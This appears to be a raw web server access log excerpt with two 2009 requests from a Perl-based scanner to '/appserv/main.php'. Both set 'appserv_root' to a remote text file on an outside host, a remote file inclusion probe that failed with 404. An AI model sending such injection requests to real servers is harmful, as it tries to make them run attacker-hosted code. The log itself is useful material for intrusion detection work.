204.30.3.225 - - [07/Sep/2009:11:26:09 -0700] "GET /appserv/main.php?appserv_root=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:26:09 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
